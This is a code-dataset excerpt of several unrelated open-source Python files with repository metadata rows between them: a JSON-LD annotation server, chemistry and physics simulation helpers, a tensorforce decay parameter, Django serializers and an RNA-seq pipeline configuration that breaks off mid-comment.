# of the same endpoint, but the join only works for the latter.
# We have to make sure the separator is present in the base.
if base and base[-1] != '/':
base = base + '/'
for item in document.get(oajson.ITEMS, []):
_item_ids_to_absolute_urls(item)
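# Illustrative note (added for clarity, not in the original module):
# urljoin() drops the last path segment of the base unless it ends in a
# separator, which is why the slash is appended above:
#   urlparse.urljoin('http://ex.org/annotations', '1')   -> 'http://ex.org/1'
#   urlparse.urljoin('http://ex.org/annotations/', '1')  -> 'http://ex.org/annotations/1'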
def _item_ids_to_absolute_urls(document, base=None):
"""Rewrite @id values from relative to absolute URL form for item."""
if base is None:
base = flask.request.base_url
try:
id_ = document['@id']
document['@id'] = urlparse.urljoin(base, id_)
except KeyError, e:
print 'Warning: no @id: %s' % str(document)
def ids_to_absolute_urls(document):
"""Rewrite @id value from relative to absolute URL form."""
if oajson.is_collection(document):
return _collection_ids_to_absolute_urls(document)
else:
return _item_ids_to_absolute_urls(document)
def remove_meta(document):
"""Remove Eve pagination meta-information ("_meta") if present."""
try:
del document['_meta']
except KeyError:
pass
def remove_status(document):
"""Remove Eve status information ("_status") if present."""
try:
del document['_status']
except KeyError:
pass
def _rewrite_collection_links(document):
"""Rewrite Eve HATEOAS-style "_links" to JSON-LD for a collection.
Also rewrites links for items in the collection."""
links = document.get('_links')
assert links is not None, 'internal error'
# Eve generates RFC 5988 link relations ("next", "prev", etc.)
# for collections when appropriate. Move these to the collection
# level.
for key in ['start', 'last', 'next', 'prev', 'previous']:
if key not in links:
pass
elif 'href' not in links[key]:
print 'Warning: no href in Eve _links[%s]' % key
else:
assert key not in document, \
'Error: redundant %s links: %s' % (key, str(document))
# fill in relative links (e.g. "people?page=2")
url = links[key]['href']
url = urlparse.urljoin(flask.request.url_root, url)
# TODO: don't assume the RESTful OA keys match Eve ones. In
# particular, consider normalizing 'prev' vs. 'previous'.
document[key] = url
# Others assumed to be redundant with JSON-LD information and safe
# to delete.
del document['_links']
# Process _links in collection items. (At the moment, just
# delete them.)
for item in document.get(oajson.ITEMS, []):
try:
del item['_links']
except KeyError:
pass
return document
def _rewrite_item_links(document):
"""Rewrite Eve HATEOAS-style "_links" to JSON-LD for non-collection."""
links = document.get('_links')
assert links is not None, 'internal error'
    # Eve is expected to provide "collection" as a reference back to
    # the collection of which the item is a member. We'll move this to
    # the item level with the collection link relation (RFC 6573).
if 'collection' not in links or 'href' not in links['collection']:
print 'Warning: no collection in Eve _links.' # TODO use logging
else:
assert oajson.COLLECTION_KEY not in document, \
'Error: redundant collection links: %s' % str(document)
document[oajson.COLLECTION_KEY] = links['collection']['href']
    # Eve also generates a "self" link, which is redundant with
    # JSON-LD "@id", and "parent", which is not defined in the RESTful
    # OA spec. These can simply be removed.
del document['_links']
return document
def rewrite_links(document):
"""Rewrite Eve HATEOAS-style "_links" to JSON-LD."""
# HATEOAS is expected but not required, so _links may be absent.
    if '_links' not in document:
print "Warning: no _links in Eve document." # TODO use logging
return document
if oajson.is_collection(document):
return _rewrite_collection_links(document)
else:
return _rewrite_item_links(document)
def is_jsonld_request(request):
"""Return True if the given Request object should be treated as
JSON-LD, False otherwise."""
content_type = request.headers['Content-Type'].split(';')[0]
# TODO: reconsider "application/json" here
return content_type in ['application/json', 'application/ld+json']
def rewrite_content_type(request):
"""Rewrite JSON-LD content type to assure compatibility with Eve."""
if request.headers['Content-Type'].split(';')[0] != 'application/ld+json':
return # OK
# Eve doesn't currently support application/ld+json, so we'll
# pretend it's just json by changing the content-type header.
# werkzeug EnvironHeaders objects are immutable and disallow
# copy(), so hack around that. (This is probably a bad idea.)
headers = { key: value for key, value in request.headers }
parts = headers['Content-Type'].split(';')
if parts[0] == 'application/ld+json':
parts[0] = 'application/json'
headers['Content-Type'] = ';'.join(parts)
request.headers = headers
def _is_create_annotation_request(document, request):
# TODO: better logic for deciding if a document is an annotation.
return (request.method == 'POST' and
(request.url.endswith('/annotations') or
request.url.endswith('/annotations/')))
def add_new_annotation_id(document, request):
"""Add IDs for annotation documents when necessary."""
if _is_create_annotation_request(document, request):
# Creating new annotation; fill ID if one is not provided.
if '_id' not in document:
document['_id'] = str(seqid.next_id())
return document
def convert_incoming_jsonld(request, lookup=None):
# force=True because older versions of flask don't recognize the
# content type application/ld+json as JSON.
doc = request.get_json(force=True)
assert doc is not None, 'get_json() failed for %s' % request.mimetype
# NOTE: it's important that the following are in-place
# modifications of the JSON dict, as assigning to request.data
# doesn't alter the JSON (it's cached) and there is no set_json().
doc = eve_from_jsonld(doc)
# If the request is a post and no ID is provided, make one
doc = add_new_annotation_id(doc, request)
# Also, we'll need to avoid application/ld+json.
rewrite_content_type(request)
def accepts_mimetype(request, mimetype):
"""Return True if requests accepts mimetype, False otherwise."""
accepted = request.headers.get('Accept')
return mimeparse.best_match([mimetype], accepted) == mimetype
def is_document_collection_request(request):
parsed = urlparse.urlparse(request.url)
return parsed.path in ('/documents', '/documents/')
def text_etag(text):
return hashlib.sha1(text.encode('utf-8')).hexdigest()
def rewrite_outgoing_document_collection(request, payload):
collection = json.loads(payload.get_data())
for document in collection.get(oajson.ITEMS, []):
# Only include the bare minimum in collection-level requests
id_, modified = document['name'], document['serializedAt']
document.clear()
document['@id'], document['serializedAt'] = id_, modified
collection = eve_to_jsonld(collection)
payload.set_data(dump_json(collection))
def rewrite_outgoing_document(request, payload):
if not is_jsonld_response(payload):
pass # Can only rewrite JSON
elif is_document_collection_request(request):
rewrite_outgoing_document_collection(request, payload)
elif not accepts_mimetype(request, 'text/plain'):
pass # Just return whatever is prepared
else:
# Return the text of the document as text/plain
doc = json.loads(payload.get_data())
try:
text = doc['text']
except KeyError, e:
text = 'Error: failed to load text: %s' % dump_json(doc)
payload.set_data(text)
payload.headers['Content-Type'] = 'text/plain; charset=utf-8'
payload.headers['ETag'] = text_etag(text)
def _rewrite_annbydoc_collection_ids(collection):
for item in collection.get(oajson.ITEMS, []):
_rewrite_annbydoc_item_id(item)
def _rewrite_annbydoc_item_id(document):
id_ = document['@id']
parts = urlparse.urlparse(id_)
m = re.match(r'^.*(/annotations/[^\/]+)$', parts.path)
if not m:
# TODO
print 'failed to rewrite ann-by-doc id %s' % id_
return
new_path = m.group(1)
rewritten = urlparse.urlunparse((parts.scheme, parts.netloc, new_path,
parts.params, parts.query, parts.fragment))
document['@id'] = rewritten
def rewrite_annbydoc_ids(request, payload):
"""Event hook to run after GET on annotations-by-document endpoint.
Removes extra "/documents/.../" from @id values. For example, an
@id of "http://ex.org/documents/1.txt/annotations/1" would be
rewritten as "http://ex.org/annotations/1".
"""
if not is_jsonld_response(payload):
return
doc = json.loads(payload.get_data())
if oajson.is_collection(doc):
_rewrite_annbydoc_collection_ids(doc)
else:
_rewrite_annbydoc_item_id(doc)
payload.set_data(dump_json(doc))
|
mit
| 7,361,483,527,524,593,000
| 36.805085
| 80
| 0.661063
| false
| 3.793367
| false
| false
| false
|
thesgc/chembiohub_ws
|
chembl_business_model/models/mechanismAnnotation.py
|
1
|
1567
|
__author__ = 'mnowotka'
import chembl_core_model.models as core
#-----------------------------------------------------------------------------------------------------------------------
class PredictedBindingDomains(core.PredictedBindingDomains):
#api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class LigandEff(core.LigandEff):
#haystack_index = ['bei', 'sei']
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class ActionType(core.ActionType):
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class DrugMechanism(core.DrugMechanism):
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
class MechanismRefs(core.MechanismRefs):
api_exclude = []
class Meta:
proxy = True
app_label = 'chembl_business_model'
#-----------------------------------------------------------------------------------------------------------------------
|
gpl-3.0
| 8,144,624,463,717,007,000
| 28.584906
| 120
| 0.333121
| false
| 5.556738
| false
| false
| false
|
mathiasmch/Krypton
|
lib/basisset.py
|
1
|
4258
|
#! /usr/bin/env python3.4
# -*- coding:utf-8 -*-
#
# Krypton - A little tool for GAMESS (US) users
#
# Copyright (C) 2012-20.. Mathias M.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os import listdir, path, makedirs
from lib.config import *
from lib.parser import extract_basis_set, extract_ECPs
################################################################################
def add_basis_set(bsid, basis_set_file):
"""
Add the basis set of a basis set file from the BSE portal into the folder
used as database.
bsid : ID to use for the basis set (STO-3G, 6-31G, etc.)
basis_set_file : GAMESS (US) input file from the BSE portal
"""
basis_set = extract_basis_set(basis_set_file)
ECPs = extract_ECPs(basis_set_file)
elements = list()
if bsid in listdir(DB):
elements = get_elements(bsid)
else:
makedirs(DB+"/"+bsid)
for element, coeffs in basis_set.items():
if element not in elements:
with open(DB+"/"+bsid+"/"+element+".txt", "w") as f:
for coeff in coeffs:
f.write(coeff+"\n")
if ECPs:
if "ECP" not in listdir(DB+"/"+bsid):
makedirs(DB+"/"+bsid+"/ECP")
elements = get_elements(bsid, True)
for element, coeffs in ECPs.items():
if element not in elements:
with open(DB+"/"+bsid+"/ECP/"+element+".txt", "w") as f:
for coeff in coeffs:
f.write(coeff+"\n")
################################################################################
def load_basis_set(bsid):
"""
Extract the basis set from the database.
bsid : ID of the basis set
return : dictionary = list of strings for each atom
example: {'H':['S 3','1 3.425 0.154','2 0.623 0.535'], 'C': ...}
"""
basis_set = dict()
if not path.isdir(DB):
raise Exception("ERROR: There is no database.")
if bsid not in listdir(DB):
raise Exception("ERROR: Basis set "+bsid+" does not exist.")
for element_file in listdir(DB+"/"+bsid):
if element_file != "ECP":
element = element_file.split(".")[0]
with open(DB+"/"+bsid+"/"+element_file) as f:
basis_set[element] = []
for line in f:
basis_set[element].append(line.rstrip())
return basis_set
################################################################################
def get_elements(bsid, ECP=False):
"""
Return the elements available in the database for the basis set bsid.
    bsid : ID of the basis set
    ECP : if True, list the elements available for the ECPs instead
    return : list of elements
"""
elements = list()
if bsid not in listdir(DB):
raise Exception("ERROR: Basis set "+bsid+" does not exist.")
    bs_path = DB+"/"+bsid
    if ECP:
        bs_path += "/ECP"
    for element in listdir(bs_path):
if element.endswith(".txt"):
elements.append(element.split(".")[0])
return elements
################################################################################
def list_basis_sets():
"""
Print the available basis sets in the database and their atoms.
"""
if not path.isdir(DB):
raise Exception("ERROR: There is no database.")
for bsid in listdir(DB):
line = bsid + " : "
for elements in get_elements(bsid):
line += elements
line += " "
if "ECP" in listdir(DB+"/"+bsid):
line += "(ECP :"
ECPs = get_elements(bsid, True)
for ECP in ECPs:
line += " "
line += ECP
line += ")"
print(line)
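################################################################################
# Hypothetical usage sketch (the file name below is illustrative, not from
# the source):
#
# add_basis_set("STO-3G", "sto-3g_gamess.inp")  # import a BSE input file
# basis_set = load_basis_set("STO-3G")          # {'H': ['S 3', ...], ...}
# print(get_elements("STO-3G"))                 # e.g. ['C', 'H', 'O']
# list_basis_sets()                             # prints "STO-3G : C H O ..."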
|
gpl-3.0
| 104,122,611,344,023,140
| 28.365517
| 80
| 0.536637
| false
| 3.990628
| false
| false
| false
|
reinforceio/tensorforce
|
tensorforce/core/parameters/exponential.py
|
1
|
2429
|
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
from tensorforce import TensorforceError
from tensorforce.core import tf_util
from tensorforce.core.parameters import Decaying
class Exponential(Decaying):
"""
Exponentially decaying hyperparameter (specification key: `exponential`).
Args:
unit ("timesteps" | "episodes" | "updates"): Unit of decay schedule
(<span style="color:#C00000"><b>required</b></span>).
num_steps (int): Number of decay steps
(<span style="color:#C00000"><b>required</b></span>).
initial_value (float): Initial value
(<span style="color:#C00000"><b>required</b></span>).
decay_rate (float): Decay rate
(<span style="color:#C00000"><b>required</b></span>).
        staircase (bool): Whether to apply the decay in a discrete staircase fashion,
            as opposed to continuously (<span style="color:#00C000"><b>default</b></span>: false).
name (string): <span style="color:#0000C0"><b>internal use</b></span>.
dtype (type): <span style="color:#0000C0"><b>internal use</b></span>.
min_value (dtype-compatible value): <span style="color:#0000C0"><b>internal use</b></span>.
max_value (dtype-compatible value): <span style="color:#0000C0"><b>internal use</b></span>.
"""
def __init__(
self, *, unit, num_steps, initial_value, decay_rate, staircase=False, name=None, dtype=None,
min_value=None, max_value=None, **kwargs
):
super().__init__(
decay='exponential', unit=unit, num_steps=num_steps, initial_value=initial_value,
name=name, dtype=dtype, min_value=min_value, max_value=max_value, decay_rate=decay_rate,
staircase=staircase, **kwargs
)
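# Illustrative note (an assumption about the wrapped TF schedule, not
# stated in this file): exponential decay computes
#     value = initial_value * decay_rate ** (step / num_steps)
# with the exponent floored when staircase=True, so for example
# unit='timesteps', num_steps=1000, initial_value=0.1, decay_rate=0.5
# halves the value every 1000 timesteps.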
|
apache-2.0
| -670,260,956,132,704,100
| 45.711538
| 100
| 0.641005
| false
| 3.943182
| false
| false
| false
|
sdgdsffdsfff/jumpserver
|
apps/assets/serializers/node.py
|
1
|
1482
|
# -*- coding: utf-8 -*-
from rest_framework import serializers
from django.utils.translation import ugettext as _
from orgs.mixins.serializers import BulkOrgResourceModelSerializer
from ..models import Asset, Node
__all__ = [
'NodeSerializer', "NodeAddChildrenSerializer",
"NodeAssetsSerializer",
]
class NodeSerializer(BulkOrgResourceModelSerializer):
name = serializers.ReadOnlyField(source='value')
value = serializers.CharField(
required=False, allow_blank=True, allow_null=True, label=_("value")
)
class Meta:
model = Node
only_fields = ['id', 'key', 'value', 'org_id']
fields = only_fields + ['name', 'full_value']
read_only_fields = ['key', 'org_id']
def validate_value(self, data):
if self.instance:
instance = self.instance
siblings = instance.get_siblings()
else:
instance = Node.org_root()
siblings = instance.get_children()
if siblings.filter(value=data):
raise serializers.ValidationError(
_('The same level node name cannot be the same')
)
return data
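    # Illustrative example (not in the original): renaming a node to a
    # value already used by one of its siblings fails validation with
    # 'The same level node name cannot be the same', while reusing a
    # value from a different level of the tree is allowed.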
class NodeAssetsSerializer(BulkOrgResourceModelSerializer):
assets = serializers.PrimaryKeyRelatedField(
many=True, queryset=Asset.objects
)
class Meta:
model = Node
fields = ['assets']
class NodeAddChildrenSerializer(serializers.Serializer):
nodes = serializers.ListField()
|
gpl-2.0
| -4,152,244,283,092,600,300
| 26.962264
| 75
| 0.644399
| false
| 4.295652
| false
| false
| false
|
SINGROUP/pycp2k
|
pycp2k/classes/_restart_averages1.py
|
1
|
1738
|
from pycp2k.inputsection import InputSection
class _restart_averages1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Itimes_start = None
self.Avecpu = None
self.Avehugoniot = None
self.Avetemp_baro = None
self.Avepot = None
self.Avekin = None
self.Avetemp = None
self.Avekin_qm = None
self.Avetemp_qm = None
self.Avevol = None
self.Avecell_a = None
self.Avecell_b = None
self.Avecell_c = None
self.Avealpha = None
self.Avebeta = None
self.Avegamma = None
self.Ave_econs = None
self.Ave_press = None
self.Ave_pxx = None
self.Ave_pv_vir = None
self.Ave_pv_tot = None
self.Ave_pv_kin = None
self.Ave_pv_cnstr = None
self.Ave_pv_xc = None
self.Ave_pv_fock_4c = None
self.Ave_colvars = None
self.Ave_mmatrix = None
self._name = "RESTART_AVERAGES"
self._keywords = {'Avehugoniot': 'AVEHUGONIOT', 'Ave_pv_kin': 'AVE_PV_KIN', 'Avepot': 'AVEPOT', 'Ave_pv_cnstr': 'AVE_PV_CNSTR', 'Avetemp_baro': 'AVETEMP_BARO', 'Avekin': 'AVEKIN', 'Ave_pv_xc': 'AVE_PV_XC', 'Avebeta': 'AVEBETA', 'Avealpha': 'AVEALPHA', 'Ave_pxx': 'AVE_PXX', 'Ave_press': 'AVE_PRESS', 'Ave_econs': 'AVE_ECONS', 'Ave_pv_fock_4c': 'AVE_PV_FOCK_4C', 'Ave_colvars': 'AVE_COLVARS', 'Ave_mmatrix': 'AVE_MMATRIX', 'Ave_pv_vir': 'AVE_PV_VIR', 'Avecell_c': 'AVECELL_C', 'Avegamma': 'AVEGAMMA', 'Avecell_a': 'AVECELL_A', 'Avekin_qm': 'AVEKIN_QM', 'Avevol': 'AVEVOL', 'Avecell_b': 'AVECELL_B', 'Itimes_start': 'ITIMES_START', 'Avetemp': 'AVETEMP', 'Avecpu': 'AVECPU', 'Avetemp_qm': 'AVETEMP_QM', 'Ave_pv_tot': 'AVE_PV_TOT'}
|
lgpl-3.0
| 1,865,731,093,727,188,500
| 47.277778
| 735
| 0.587457
| false
| 2.544656
| false
| false
| false
|
saullocastro/pyNastran
|
pyNastran/bdf/dev_vectorized/cards/loads/static/grav.py
|
1
|
4585
|
from six.moves import zip
import numpy as np
from numpy import zeros, unique
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.field_writer_16 import print_card_16
from pyNastran.bdf.bdf_interface.assign_type import (integer, integer_or_blank,
double, double_or_blank)
from pyNastran.bdf.dev_vectorized.cards.loads.vectorized_load import VectorizedLoad
class GRAV(VectorizedLoad):
"""
+------+-----+-----+------+-----+-----+------+-----+
| GRAV | SID | CID | A | N1 | N2 | N3 | MB |
+------+-----+-----+------+-----+-----+------+-----+
| GRAV | 1 | 3 | 32.2 | 0.0 | 0.0 | -1.0 | |
+------+-----+-----+------+-----+-----+------+-----+
"""
type = 'GRAV'
def __init__(self, model):
"""
Defines the GRAV object.
Parameters
----------
model : BDF
the BDF object
.. todo:: collapse loads
"""
VectorizedLoad.__init__(self, model)
#self.model = model
#self.n = 0
#self._cards = []
#self._comments = []
def __getitem__(self, i):
#unique_lid = unique(self.load_id)
if len(i):
f = GRAV(self.model)
f.load_id = self.load_id[i]
f.coord_id = self.coord_id[i]
f.scale = self.scale[i]
f.N = self.N[i]
f.mb = self.mb[i]
f.n = len(i)
return f
raise RuntimeError('len(i) = 0')
def __mul__(self, value):
f = GRAV(self.model)
f.load_id = self.load_id
f.coord_id = self.coord_id
f.scale = self.scale * value
f.N = self.N
f.mb = self.mb
f.n = self.n
return f
def __rmul__(self, value):
return self.__mul__(value)
def allocate(self, card_count):
ncards = card_count[self.type]
if ncards:
self.n = ncards
float_fmt = self.model.float_fmt
#: Set identification number
self.load_id = zeros(ncards, 'int32')
#: Coordinate system identification number.
self.coord_id = zeros(ncards, 'int32')
#: scale factor
self.scale = zeros(ncards, float_fmt)
self.N = zeros((ncards, 3), float_fmt)
self.mb = zeros(ncards, 'int32')
def add_card(self, card, comment=''):
#self._cards.append(card)
#self._comments.append(comment)
i = self.i
self.load_id[i] = integer(card, 1, 'sid')
#self.node_id[i] = integer(card, 1, 'node_id')
self.coord_id[i] = integer_or_blank(card, 2, 'cid', 0)
self.scale[i] = double(card, 3, 'scale')
#: Acceleration vector components measured in coordinate system CID
self.N[i, :] = [double_or_blank(card, 4, 'N1', 0.0),
double_or_blank(card, 5, 'N2', 0.0),
double_or_blank(card, 6, 'N3', 0.0)]
#: Indicates whether the CID coordinate system is defined in the
#: main Bulk Data Section (MB = -1) or the partitioned superelement
#: Bulk Data Section (MB = 0). Coordinate systems referenced in the
#: main Bulk Data Section are considered stationary with respect to
#: the assembly basic coordinate system. See Remark 10.
#: (Integer; Default = 0)
self.mb[i] = integer_or_blank(card, 7, 'mb', 0)
assert len(card) <= 8, 'len(GRAV card) = %i\ncard=%s' % (len(card), card)
self.i += 1
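    # Illustrative example (fields follow the card table in the class
    # docstring): parsing ['GRAV', 1, 3, 32.2, 0.0, 0.0, -1.0] stores
    # load_id=1, coord_id=3, scale=32.2 and N=[0., 0., -1.] at row i,
    # with mb defaulting to 0.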
def build(self):
"""
Parameters
----------
:param cards: the list of GRAV cards
"""
if self.n:
i = self.load_id.argsort()
self.load_id = self.load_id[i]
#self.node_id = self.node_id[i]
self.coord_id = self.coord_id[i]
self.scale = self.scale[i]
self.N = self.N[i]
self._cards = []
self._comments = []
def get_stats(self):
msg = []
if self.n:
msg.append(' %-8s: %i' % ('GRAV', self.n))
return msg
def write_card_by_index(self, bdf_file, size=8, is_double=False, i=None):
for (lid, cid, scale, N, mb) in zip(
self.load_id[i], self.coord_id[i], self.scale[i], self.N[i, :], self.mb[i]):
card = ['GRAV', lid, cid, scale, N[0], N[1], N[2], mb]
if size == 8:
bdf_file.write(print_card_8(card))
else:
bdf_file.write(print_card_16(card))
def get_load_ids(self):
return np.unique(self.load_id)
|
lgpl-3.0
| 771,074,946,562,571,900
| 32.467153
| 89
| 0.499891
| false
| 3.363903
| false
| false
| false
|
lenarother/moderna
|
moderna/modifications/ModificationAdder.py
|
1
|
3806
|
"""
Add modifications to a residue
"""
from ResidueEditor import ResidueEditor
from BaseExchanger import BaseExchanger
from ModificationRemover import ModificationRemover
from moderna.util.Errors import AddModificationError
from moderna.util.LogFile import log
from moderna.Constants import ANY_RESIDUE, MISSING_RESIDUE, \
UNKNOWN_RESIDUE_SHORT, B_FACTOR_ADD_MODIF, \
ADDING_MODIFICATION_RULES_PATH
def parse_modification_rules(separator=' | '):
"""
Prepares a rule for adding a modification.
Rules describe which fragments add and how to do this
to obtain a residue with given modification.
Returns dict of list of dicts with rules for adding a single fragment.
Keys in each rule dict: ['modification_name', 'original_base', 'remove',
'moved_link_atoms', 'fixed_link_atoms', 'fragment_file_name', 'pdb_abbrev']
"""
rules = {}
try:
infile = open(ADDING_MODIFICATION_RULES_PATH)
except IOError:
log.write_message('File does not exist: %s ' % ADDING_MODIFICATION_RULES_PATH)
return {}
for line in infile:
line = line.strip().split(separator)
if len(line) >= 7:
mod_name = line[0].strip()
rules.setdefault(mod_name, [])
rule = {}
rule['modification_name'] = line[0]
rule['original_base'] = line[1]
rule['remove'] = line[2]
rule['moved_link_atoms'] = line[3].split(',')
rule['fixed_link_atoms'] = line[4].split(',')
rule['fragment_file_name'] = line[5]
rule['pdb_abbrev'] = line[6]
rules[mod_name].append(rule)
return rules
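# Illustrative sketch (hypothetical rule values, not taken from the real
# rules file): with the default ' | ' separator, a line such as
#   m1A | a | N6 | N1,C6 | N1,C6 | m1A_fragment.pdb | 1MA
# would yield rules['m1A'][0]['original_base'] == 'a' and
# rules['m1A'][0]['moved_link_atoms'] == ['N1', 'C6'].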
MODIFICATION_RULES = parse_modification_rules()
class ModificationAdder(ResidueEditor):
def add_modification(self, resi, modification_name):
"""
Adds a modification to a residue.
        It adds single fragments (add_single_fragment)
        according to the modification rules (parse_modification_rules).
Arguments:
- modification name (as a long abbreviation)
"""
try:
if modification_name in [ANY_RESIDUE, MISSING_RESIDUE]:
raise AddModificationError('Residue %s: expected a modification name, instead got missing/any residue abbreviation "%s"'\
% (resi.identifier, modification_name))
else:
if resi.long_abbrev == UNKNOWN_RESIDUE_SHORT:
self.mutate_unknown_residue(resi)
if resi.modified:
rem = ModificationRemover()
rem.remove_modification(resi)
rules = MODIFICATION_RULES.get(modification_name, [])
if not rules:
raise AddModificationError('Residue %s: there is no rule for adding this modification. Check modification name "%s".' \
%(resi.identifier, modification_name))
else:
if rules[0]['original_base'] != resi.original_base:
bex = BaseExchanger()
bex.exchange_base(resi, rules[0]['original_base'])
for rule in rules:
self.add_single_fragment(resi, rule)
resi.change_name(modification_name)
self.set_bfactor(resi, B_FACTOR_ADD_MODIF)
except IOError:
raise AddModificationError('Residue %s: could not add modification.' % resi.identifier)
def add_modification(resi, long_abbrev):
"""Adds modification with given abbreviation"""
old_name = resi.long_abbrev
add = ModificationAdder()
add.add_modification(resi, long_abbrev)
log.write_message('Residue %s: modification added (%s ---> %s).' %(resi.identifier, old_name, long_abbrev))
|
gpl-3.0
| 1,377,465,879,723,447,600
| 39.063158
| 139
| 0.607199
| false
| 4.083691
| false
| false
| false
|
jessicachung/rna_seq_pipeline
|
pipeline_config.py
|
1
|
8036
|
#---------------------------------
# PIPELINE RUN
#---------------------------------
# The configuration settings to run the pipeline. These options are overwritten
# if a new setting is specified as an argument when running the pipeline.
# These settings include:
# - logDir: The directory where the batch queue scripts are stored, along with
# stdout and stderr dumps after the job is run.
# - logFile: Log file in logDir which all commands submitted are stored.
# - style: the style which the pipeline runs in. One of:
# - 'print': prints the stages which will be run to stdout,
# - 'run': runs the pipeline until the specified stages are finished, and
# - 'flowchart': outputs a flowchart of the pipeline stages specified and
# their dependencies.
# - procs: the number of python processes to run simultaneously. This
# determines the maximum parallelism of the pipeline. For distributed jobs
# it also constrains the maximum total jobs submitted to the queue at any one
# time.
# - verbosity: one of 0 (quiet), 1 (normal), 2 (chatty).
# - end: the desired tasks to be run. Rubra will also run all tasks which are
# dependencies of these tasks.
# - force: tasks which will be forced to run, regardless of timestamps.
# - rebuild: one of 'fromstart','fromend'. Whether to calculate which
# dependencies will be rerun by working back from an end task to the latest
# up-to-date task, or forward from the earliest out-of-date task. 'fromstart'
# is the most conservative and commonly used as it brings all intermediate
# tasks up to date.
# - manager: "pbs" or "slurm"
pipeline = {
"logDir": "log",
"logFile": "pipeline_commands.log",
"style": "print",
"procs": 16,
"verbose": 2,
"end": ["fastQCSummary", "voom", "edgeR", "qcSummary"],
"force": [],
"rebuild": "fromstart",
"manager": "slurm",
}
# This option specifies whether or not you are using VLSCI's Merri or Barcoo
# cluster. If True, this changes java's tmpdir to the job's tmp dir on
# /scratch ($TMPDIR) instead of using the default /tmp which has limited space.
using_merri = True
# Optional parameter governing how Ruffus determines which part of the
# pipeline is out-of-date and needs to be re-run. If set to False, Ruffus
# will work back from the end target tasks and only execute the pipeline
# after the first up-to-date tasks that it encounters.
# Warning: Use with caution! If you don't understand what this option does,
# keep this option as True.
maximal_rebuild_mode = True
#---------------------------------
# CONFIG
#---------------------------------
# Name of analysis. Changing the name will create new sub-directories for
# voom, edgeR, and cuffdiff analysis.
analysis_name = "analysis_v1"
# The directory containing *.fastq.gz read files.
raw_seq_dir = "/path_to_project/fastq_files/"
# Path to the CSV file with sample information regarding condition and
# covariates if available.
samples_csv = "/path_to_project/fastq_files/samples.csv"
# Path to the CSV file with which comparisons to make.
comparisons_csv = "/path_to_project/fastq_files/comparisons.csv"
# The output directory.
output_dir = "/path_to_project/results/"
# Sequencing platform for read group information.
platform = "Illumina"
# If the experiment is paired-end or single-end: True (PE) or False (SE).
paired_end = False
# Whether the experiment is strand specific: "yes", "no", or "reverse".
stranded = "no"
#---------------------------------
# REFERENCE FILES
#---------------------------------
# Most reference files can be obtained from the Illumina iGenomes project:
# http://cufflinks.cbcb.umd.edu/igenomes.html
# Bowtie 2 index files: *.1.bt2, *.2.bt2, *.3.bt2, *.4.bt2, *.rev.1.bt2,
# *.rev.2.bt2.
genome_ref = "/vlsci/VR0002/shared/Reference_Files/Indexed_Ref_Genomes/bowtie_Indexed/human_g1k_v37"
# Genome reference FASTA. Also needs an indexed genome (.fai) and dictionary
# (.dict) file in the same directory.
genome_ref_fa = "/vlsci/VR0002/shared/Reference_Files/Indexed_Ref_Genomes/bowtie_Indexed/human_g1k_v37.fa"
# Gene set reference file (.gtf). Recommend using the GTF file obtained from
# Ensembl as Ensembl gene IDs are used for annotation (if specified).
gene_ref = "/vlsci/VR0002/shared/Reference_Files/Indexed_Ref_Genomes/TuxedoSuite_Ref_Files/Homo_sapiens/Ensembl/GRCh37/Annotation/Genes/genes.gtf"
# Either a rRNA reference fasta (ending in .fasta or .fa) or an GATK interval
# file (ending in .list) containing rRNA intervals to calculate the rRNA
# content. Can set as False if not available.
# rrna_ref = "/vlsci/VR0002/shared/Reference_Files/rRNA/human_all_rRNA.fasta"
rrna_ref = "/vlsci/VR0002/shared/jchung/human_reference_files/human_rRNA.list"
# Optional tRNA and rRNA sequences to filter out in Cuffdiff (.gtf or .gff).
# Set as False if not provided.
cuffdiff_mask_file = False
#---------------------------------
# TRIMMOMATIC PARAMETERS
#---------------------------------
# Parameters for Trimmomatic (a tool for trimming Illumina reads).
# http://www.usadellab.org/cms/index.php?page=trimmomatic
# Path of a FASTA file containing adapter sequences used in sequencing.
adapter_seq = "/vlsci/VR0002/shared/jchung/human_reference_files/TruSeqAdapters.fa"
# The maximum mismatch count which will still allow a full match to be
# performed.
seed_mismatches = 2
# How accurate the match between the two 'adapter ligated' reads must be for
# PE palindrome read alignment.
palendrome_clip_threshold = 30
# How accurate the match between any adapter etc. sequence must be against a
# read.
simple_clip_threshold = 10
# The minimum quality needed to keep a base and the minimum length of reads to
# be kept.
extra_parameters = "LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15 MINLEN:36"
# Output Trimmomatic log file
write_trimmomatic_log = True
#---------------------------------
# R PARAMETERS
#---------------------------------
# Get annotations from Ensembl BioMart. GTF file needs to use IDs from Ensembl.
# Set as False to skip annotation, else
# provide the name of the dataset that will be queried. Attributes to be
# obtained include gene symbol, chromosome name, description, and gene biotype.
# Commonly used datasets:
# human: "hsapiens_gene_ensembl"
# mouse: "mmusculus_gene_ensembl"
# rat: "rnorvegicus_gene_ensembl"
# You can list all available datasets in R by using the listDatasets function:
# > library(biomaRt)
# > listDatasets(useMart("ensembl"))
# The gene symbol is obtained from the attribute "hgnc_symbol" (human) or
